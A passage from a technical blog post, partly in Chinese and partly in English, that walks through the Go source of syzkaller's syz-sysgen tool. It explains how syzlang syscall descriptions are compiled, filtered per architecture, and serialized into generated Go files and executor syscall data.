<span class="keyword">range</span> OSList &#123;</span><br><span class="line">    ...</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">var</span> syscallArchs []ArchData</span><br><span class="line">    unsupported := <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]<span class="type">int</span>)</span><br><span class="line">    <span class="keyword">for</span> _, job := <span class="keyword">range</span> jobs &#123;</span><br><span class="line">        <span class="keyword">if</span> !job.OK &#123;</span><br><span class="line">            fmt.Printf(<span class="string">&quot;compilation of %v/%v target failed:\n&quot;</span>, job.Target.OS, job.Target.Arch)</span><br><span class="line">            <span class="keyword">for</span> _, msg := <span class="keyword">range</span> job.Errors &#123;</span><br><span class="line">                fmt.Print(msg)</span><br><span class="line">            &#125;</span><br><span class="line">            os.Exit(<span class="number">1</span>)</span><br><span class="line">        &#125;</span><br><span class="line">        syscallArchs = <span class="built_in">append</span>(syscallArchs, job.ArchData)</span><br><span class="line">        <span class="keyword">for</span> u := <span class="keyword">range</span> job.Unsupported &#123;</span><br><span class="line">            unsupported[u]++</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    data.OSes = <span class="built_in">append</span>(data.OSes, OSData&#123;</span><br><span class="line">        GOOS:  OS,</span><br><span class="line">        Archs: syscallArchs,</span><br><span class="line">    &#125;)</span><br><span class="line"></span><br><span class="line">    <span class="keyword">for</span> what, count := <span class="keyword">range</span> unsupported &#123;</span><br><span class="line">        <span 
class="keyword">if</span> count == <span class="built_in">len</span>(jobs) &#123;</span><br><span class="line">            tool.Failf(<span class="string">&quot;%v is unsupported on all arches (typo?)&quot;</span>, what)</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>第三部分没什么需要特别关注的，这部分主要是检查每个 job 是否编译成功、是否存在在所有 arch 上都不被支持的条目，并将先前 worker 里生成的 ArchData 提取进变量 data 中。</p></li></ul><p>for 循环结束后，main 函数最后这部分的代码继续为变量 data 设置一些字段：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">attrs := reflect.TypeOf(prog.SyscallAttrs&#123;&#125;)</span><br><span class="line"><span class="keyword">for</span> i := <span class="number">0</span>; i &lt; attrs.NumField(); i++ &#123;</span><br><span class="line">    data.CallAttrs = <span class="built_in">append</span>(data.CallAttrs, prog.CppName(attrs.Field(i).Name))</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">props := prog.CallProps&#123;&#125;</span><br><span class="line">props.ForeachProp(<span class="function"><span class="keyword">func</span><span class="params">(name, _ <span class="type">string</span>, value reflect.Value)</span></span> &#123;</span><br><span class="line">    data.CallProps = <span class="built_in">append</span>(data.CallProps, CallPropDescription&#123;</span><br><span class="line">        Type: value.Kind().String(),</span><br><span class="line">        Name: prog.CppName(name),</span><br><span class="line">    &#125;)</span><br><span 
class="line">&#125;)</span><br></pre></td></tr></table></figure><p>这部分代码乍看上去可能不太能理解，但仔细一看就能发现，它只是分别将 <code>prog.SyscallAttrs</code> 和 <code>prog.CallProps</code> 这两个结构体对应的字段名存了起来。俩结构体声明如下：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// SyscallAttrs represents call attributes in syzlang.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// This structure is the source of truth for the all other parts of the system.</span></span><br><span class="line"><span class="comment">// pkg/compiler uses this structure to parse descriptions.</span></span><br><span class="line"><span class="comment">// syz-sysgen uses this structure to generate code for executor.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// Only bool&#x27;s and uint64&#x27;s are currently supported.</span></span><br><span class="line"><span class="comment">//</span></span><br><span class="line"><span class="comment">// See docs/syscall_descriptions_syntax.md for description of individual attributes.</span></span><br><span 
class="line"><span class="keyword">type</span> SyscallAttrs <span class="keyword">struct</span> &#123;</span><br><span class="line">    Disabled      <span class="type">bool</span></span><br><span class="line">    Timeout       <span class="type">uint64</span></span><br><span class="line">    ProgTimeout   <span class="type">uint64</span></span><br><span class="line">    IgnoreReturn  <span class="type">bool</span></span><br><span class="line">    BreaksReturns <span class="type">bool</span></span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="comment">// These properties are parsed and serialized according to the tag and the type</span></span><br><span class="line"><span class="comment">// of the corresponding fields.</span></span><br><span class="line"><span class="comment">// IMPORTANT: keep the exact values of &quot;key&quot; tag for existing props unchanged,</span></span><br><span class="line"><span class="comment">// otherwise the backwards compatibility would be broken.</span></span><br><span class="line"><span class="keyword">type</span> CallProps <span class="keyword">struct</span> &#123;</span><br><span class="line">    FailNth <span class="type">int</span> <span class="string">`key:&quot;fail_nth&quot;`</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>实际保存进变量 data 中的内容如下：</p><p><img src="/2022/03/syzkaller-1/image-20220309231414961.png" alt="image-20220309231414961"></p><p>通过对上面源码的分析，我发现貌似 syz-sysgen <strong>将整个 <code>prog.SyscallAttrs</code> 结构体的字段名和每个 syscall 所对应的数据，全都转换成了普通字符串型和整型</strong>。看上去这像是要用这些数据来填充 C 语言模板？我们接下来再来看看 writeExecutorSyscalls 函数，看看这里面具体是做了什么。</p><blockquote><p>writeExecutorSyscalls 函数源码分析位于下文，这里不再赘述。</p></blockquote><h3 id="2-processJob">2. 
processJob</h3><p>processJob 函数的主要功能是：编译传入的 syzlang AST，分析其中的 syscall 类型信息等，并序列化为 golang 源码。</p><p>传入 processJob 的参数 <code>job</code>，其结构体声明如下所示：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">type</span> Job <span class="keyword">struct</span> &#123;</span><br><span class="line">    Target      *targets.Target <span class="comment">// 存放着一些关于特定 OS 特定 arch 的一些常量信息</span></span><br><span class="line">    OK          <span class="type">bool</span></span><br><span class="line">    Errors      []<span class="type">string</span>        <span class="comment">// 保存报错信息的字符串集合，一条字符串表示一行报错信息</span></span><br><span class="line">    Unsupported <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span> <span class="comment">// 存放不支持的 syscall 集合</span></span><br><span class="line">    ArchData    ArchData        <span class="comment">// 存放待从 worker routine 返回给 main 函数的数据</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>首先，该函数会生成一个 error handler，用于输出错误信息；之后从 ConstFile 结构体中，取出对应 arch 的 consts <strong>字符串-&gt;整型</strong>映射表：</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">eh := <span class="function"><span class="keyword">func</span><span class="params">(pos ast.Pos, msg <span class="type">string</span>)</span></span> &#123;</span><br><span 
class="line">    job.Errors = <span class="built_in">append</span>(job.Errors, fmt.Sprintf(<span class="string">&quot;%v: %v\n&quot;</span>, pos, msg))</span><br><span class="line">&#125;</span><br><span class="line">consts := constFile.Arch(job.Target.Arch)</span><br><span class="line">top := descriptions</span><br></pre></td></tr></table></figure><p><img src="/2022/03/syzkaller-1/image-20220309171903363.png" alt="image-20220309171903363"></p><p>Next, for the Linux architectures that need special handling (ARM and RiscV64 in the code below), syz-sysgen installs a filter that drops the syzlang descriptions coming from files whose names end in <code>_kvm.txt</code>, so they take no part in processing. The resources, structs, calls, and typedefs dropped this way are recorded in <code>job.Unsupported</code>, and the following steps skip them:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line"><span class="keyword">if</span> job.Target.OS == targets.Linux &amp;&amp; (job.Target.Arch == targets.ARM || job.Target.Arch == targets.RiscV64) &#123;</span><br><span class="line">    <span class="comment">// Hack: KVM is not supported on ARM anymore. 
On riscv64 it</span></span><br><span class="line">    <span class="comment">// is not supported yet but might be in the future.</span></span><br><span class="line">    <span class="comment">// Note: syz-extract also ignores this file for arm and riscv64.</span></span><br><span class="line">    top = descriptions.Filter(<span class="function"><span class="keyword">func</span><span class="params">(n ast.Node)</span></span> <span class="type">bool</span> &#123;</span><br><span class="line">        pos, typ, name := n.Info()</span><br><span class="line">        <span class="keyword">if</span> !strings.HasSuffix(pos.File, <span class="string">&quot;_kvm.txt&quot;</span>) &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="literal">true</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">switch</span> n.(<span class="keyword">type</span>) &#123;</span><br><span class="line">            <span class="keyword">case</span> *ast.Resource, *ast.Struct, *ast.Call, *ast.TypeDef:</span><br><span class="line">            <span class="comment">// Mimic what pkg/compiler would do with unsupported entries.</span></span><br><span class="line">            <span class="comment">// This is required to keep the unsupported diagnostic below working</span></span><br><span class="line">            <span class="comment">// for kvm entries, otherwise it will not think that kvm entries</span></span><br><span class="line">            <span class="comment">// are not supported on all architectures.</span></span><br><span class="line">            job.Unsupported[typ+<span class="string">&quot; &quot;</span>+name] = <span class="literal">true</span></span><br><span class="line">        &#125;</span><br><span class="line">        <span class="keyword">return</span> <span class="literal">false</span></span><br><span class="line">    &#125;)</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><p>Besides the Linux architectures that need filtering, syz-sysgen also special-cases TestOS, the target that syzkaller developers use for their own tests. Judging by the function names, it does not filter anything here; it extracts the consts referenced by the descriptions and fabricates syscall consts for them:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line"><span class="keyword">if</span> job.Target.OS == targets.TestOS &#123;</span><br><span class="line">    constInfo := compiler.ExtractConsts(top, job.Target, eh)</span><br><span class="line">    compiler.FabricateSyscallConsts(job.Target, constInfo, consts)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><blockquote><p>Here, targets.TestOS corresponds to the string <code>test</code>.</p></blockquote><p>Next, syz-sysgen analyzes the AST and compiles the syzlang descriptions:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">prog := compiler.Compile(top, consts, job.Target, eh)</span><br><span class="line"><span class="keyword">if</span> prog == <span class="literal">nil</span> &#123;</span><br><span class="line">    <span class="keyword">return</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">for</span> what := <span class="keyword">range</span> prog.Unsupported &#123;</span><br><span class="line">    job.Unsupported[what] = <span class="literal">true</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>The returned Prog 
struct is declared as follows:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: declared in package `compiler` (pkg/compiler)</span></span><br><span class="line"> </span><br><span class="line"><span class="comment">// Prog is description compilation result.</span></span><br><span class="line"><span class="keyword">type</span> Prog <span class="keyword">struct</span> &#123;</span><br><span class="line">    Resources []*prog.ResourceDesc</span><br><span class="line">    Syscalls  []*prog.Syscall</span><br><span class="line">    Types     []prog.Type</span><br><span class="line">    <span class="comment">// Set of unsupported syscalls/flags.</span></span><br><span class="line">    Unsupported <span class="keyword">map</span>[<span class="type">string</span>]<span class="type">bool</span></span><br><span class="line">    <span class="comment">// Returned if consts was nil.</span></span><br><span class="line">    fileConsts <span class="keyword">map</span>[<span class="type">string</span>]*ConstInfo</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>Compilation works much as it did in syz-extract. The difference is that consts are supplied this time, so the full compilation runs and analyzes <strong>all syscall argument type information</strong> described in the syzlang code. In the returned Prog struct:</p><ul><li>the fileConsts field is empty;</li><li>the type information is stored in the Resources and Types fields;</li><li>the syscall descriptions are stored in the Syscalls field.</li></ul><p>The analysis result is then serialized as Go source code for syz-fuzzer to use later. The generated code is written to <code>sys/&lt;OS&gt;/gen/&lt;arch&gt;.go</code>, for example <code>sys/linux/gen/amd64.go</code> (<strong>roughly 110,000 lines</strong>):</p><figure class="highlight go"><table><tr><td 
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">sysFile := filepath.Join(*outDir, <span class="string">&quot;sys&quot;</span>, job.Target.OS, <span class="string">&quot;gen&quot;</span>, job.Target.Arch+<span class="string">&quot;.go&quot;</span>)</span><br><span class="line">out := <span class="built_in">new</span>(bytes.Buffer)</span><br><span class="line"><span class="comment">// generate serializes the compilation result as Go source</span></span><br><span class="line">generate(job.Target, prog, consts, out)</span><br><span class="line">rev := hash.String(out.Bytes())</span><br><span class="line">fmt.Fprintf(out, <span class="string">&quot;const revision_%v = %q\n&quot;</span>, job.Target.Arch, rev)</span><br><span class="line">writeSource(sysFile, out.Bytes())</span><br></pre></td></tr></table></figure><p>Let's see what the generated Go code looks like, using <code>sys/linux/gen/amd64.go</code> as an example:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span 
class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// AUTOGENERATED FILE</span></span><br><span class="line"><span class="comment">// +build !codeanalysis</span></span><br><span class="line"><span class="comment">// +build !syz_target syz_target,syz_os_linux,syz_arch_amd64</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">package</span> gen</span><br><span class="line"></span><br><span class="line"><span class="keyword">import</span> . 
<span class="string">&quot;github.com/google/syzkaller/prog&quot;</span></span><br><span class="line"><span class="keyword">import</span> . <span class="string">&quot;github.com/google/syzkaller/sys/linux&quot;</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">init</span><span class="params">()</span></span> &#123;</span><br><span class="line">    RegisterTarget(&amp;Target&#123;OS: <span class="string">&quot;linux&quot;</span>, Arch: <span class="string">&quot;amd64&quot;</span>, Revision: revision_amd64, PtrSize: <span class="number">8</span>, PageSize: <span class="number">4096</span>, NumPages: <span class="number">4096</span>, DataOffset: <span class="number">536870912</span>, LittleEndian: <span class="literal">true</span>, ExecutorUsesShmem: <span class="literal">true</span>, Syscalls: syscalls_amd64, Resources: resources_amd64, Consts: consts_amd64&#125;, types_amd64, InitTarget)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> resources_amd64 = []*ResourceDesc&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;ANYRES16&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;ANYRES16&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">18446744073709551615</span>,<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;ANYRES32&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;ANYRES32&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">18446744073709551615</span>,<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;ANYRES64&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span 
class="string">&quot;ANYRES64&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">18446744073709551615</span>,<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;IMG_DEV_VIRTADDR&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;IMG_DEV_VIRTADDR&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;IMG_HANDLE&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;IMG_HANDLE&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">0</span>&#125;&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;assoc_id&quot;</span>,Kind:[]<span class="type">string</span>&#123;<span class="string">&quot;assoc_id&quot;</span>&#125;,Values:[]<span class="type">uint64</span>&#123;<span class="number">0</span>&#125;&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> syscalls_amd64 = []*Syscall&#123;</span><br><span class="line">&#123;NR:<span class="number">43</span>,Name:<span class="string">&quot;accept&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11199</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">10021</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">10305</span>)&#125;,</span><br><span class="line">&#125;,Ret:Ref(<span class="number">11199</span>)&#125;,</span><br><span class="line">&#123;NR:<span 
class="number">43</span>,Name:<span class="string">&quot;accept$alg&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11202</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">4943</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">4943</span>)&#125;,</span><br><span class="line">&#125;,Ret:Ref(<span class="number">11203</span>)&#125;,</span><br><span class="line">&#123;NR:<span class="number">43</span>,Name:<span class="string">&quot;accept$ax25&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11204</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">10033</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">10305</span>)&#125;,</span><br><span class="line">&#125;,Ret:Ref(<span class="number">11204</span>)&#125;,</span><br><span class="line">&#123;NR:<span class="number">43</span>,Name:<span class="string">&quot;accept$inet&quot;</span>,CallName:<span class="string">&quot;accept&quot;</span>,Args:[]Field&#123;</span><br><span class="line">&#123;Name:<span class="string">&quot;fd&quot;</span>,Type:Ref(<span class="number">11223</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peer&quot;</span>,Type:Ref(<span class="number">10025</span>)&#125;,</span><br><span class="line">&#123;Name:<span class="string">&quot;peerlen&quot;</span>,Type:Ref(<span class="number">10305</span>)&#125;,</span><br><span 
class="line">&#125;,Ret:Ref(<span class="number">11223</span>)&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> types_amd64 = []Type&#123;</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">17155</span>)&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14707</span>),Kind:<span class="number">1</span>,RangeEnd:<span class="number">32</span>&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14707</span>),Kind:<span class="number">1</span>,RangeEnd:<span class="number">8</span>&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14560</span>)&#125;,</span><br><span class="line">&amp;ArrayType&#123;TypeCommon:TypeCommon&#123;TypeName:<span class="string">&quot;array&quot;</span>,TypeAlign:<span class="number">1</span>,IsVarlen:<span class="literal">true</span>&#125;,Elem:Ref(<span class="number">14575</span>)&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">var</span> consts_amd64 = []ConstValue&#123;</span><br><span class="line">&#123;<span 
class="string">&quot;ABS_CNT&quot;</span>,<span class="number">64</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ABS_MAX&quot;</span>,<span class="number">63</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_EXECUTE&quot;</span>,<span class="number">1</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_GROUP&quot;</span>,<span class="number">8</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_GROUP_OBJ&quot;</span>,<span class="number">4</span>&#125;,</span><br><span class="line">&#123;<span class="string">&quot;ACL_LINK&quot;</span>,<span class="number">1</span>&#125;,</span><br><span class="line">....</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">const</span> revision_amd64 = <span class="string">&quot;e61403f96ca19fc071d8e9c946b2259a2804c68e&quot;</span></span><br></pre></td></tr></table></figure><p>The init function registers this linux/amd64 target in the <code>targets</code> map, keyed by <code>OS/arch</code>, so that syz-fuzzer can look it up later.</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> targets = <span class="built_in">make</span>(<span class="keyword">map</span>[<span class="type">string</span>]*Target)</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">func</span> <span class="title">RegisterTarget</span><span class="params">(target *Target, types []Type, initArch <span class="keyword">func</span>(target *Target)</span></span>) 
&#123;</span><br><span class="line">    key := target.OS + <span class="string">&quot;/&quot;</span> + target.Arch</span><br><span class="line">    <span class="keyword">if</span> targets[key] != <span class="literal">nil</span> &#123;</span><br><span class="line">        <span class="built_in">panic</span>(fmt.Sprintf(<span class="string">&quot;duplicate target %v&quot;</span>, key))</span><br><span class="line">    &#125;</span><br><span class="line">    target.initArch = initArch</span><br><span class="line">    target.types = types</span><br><span class="line">    targets[key] = target</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>amd64.go also declares several arrays and one constant:</p><ul><li><code>resources_amd64</code> array: every resource declared in the syzlang code</li><li><code>syscalls_amd64</code> array: the name and syscall number of each syscall, plus the name and type of each argument</li><li><code>types_amd64</code> array: the details of each type, such as array and struct type information</li><li><code>consts_amd64</code>: the mapping from const names to integer values</li><li><code>revision_amd64</code>: a hash of the generated amd64.go source</li></ul><p>Back in processJob, the last step is to call generateExecutorSyscalls to build the syscall information for the executor and hand it back to the caller (the main function) through job.ArchData:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">// Kiprey: in function `processJob`</span></span><br><span class="line">job.ArchData = generateExecutorSyscalls(job.Target, prog.Syscalls, rev)</span><br><span class="line">  </span><br><span class="line"><span class="comment">// Don&#x27;t print warnings, they are printed in syz-check.</span></span><br><span class="line">job.Errors = <span class="literal">nil</span></span><br><span class="line">job.OK = <span class="literal">true</span></span><br></pre></td></tr></table></figure><p>This information is later used to generate the C 
code of syz-executor.</p><h3 id="3-generateExecutorSyscalls">3. generateExecutorSyscalls</h3><p>This function prepares the syscall data needed to generate syz-executor, which is exactly what its name says: <strong>generate the executor's syscall data</strong>.</p><p>It starts by creating an ArchData struct, which is passed back up the call chain to main.</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">data := ArchData&#123;</span><br><span class="line">    Revision:   rev,</span><br><span class="line">    GOARCH:     target.Arch,</span><br><span class="line">    PageSize:   target.PageSize,</span><br><span class="line">    NumPages:   target.NumPages,</span><br><span class="line">    DataOffset: target.DataOffset,</span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> target.ExecutorUsesForkServer &#123;</span><br><span class="line">    data.ForkServer = <span class="number">1</span></span><br><span class="line">&#125;</span><br><span class="line"><span class="keyword">if</span> target.ExecutorUsesShmem &#123;</span><br><span class="line">    data.Shmem = <span class="number">1</span></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>If the target struct for the <strong>target OS &amp; arch</strong> enables ForkServer or Shmem (shared memory), the corresponding field in data is set to 1, so that syz-executor can use these techniques to speed up fuzzing.</p>
<p>Next comes a for loop that <strong>iterates over every Syscall struct in the syscalls slice</strong>. The loop looks opaque at first glance, but all it does is <strong>read each field of the SyscallAttrs struct held by variable c and append it to the integer slice attrVals</strong>; the resulting attrVals is then used to build a SyscallData struct:</p><figure class="highlight go"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> _, c := 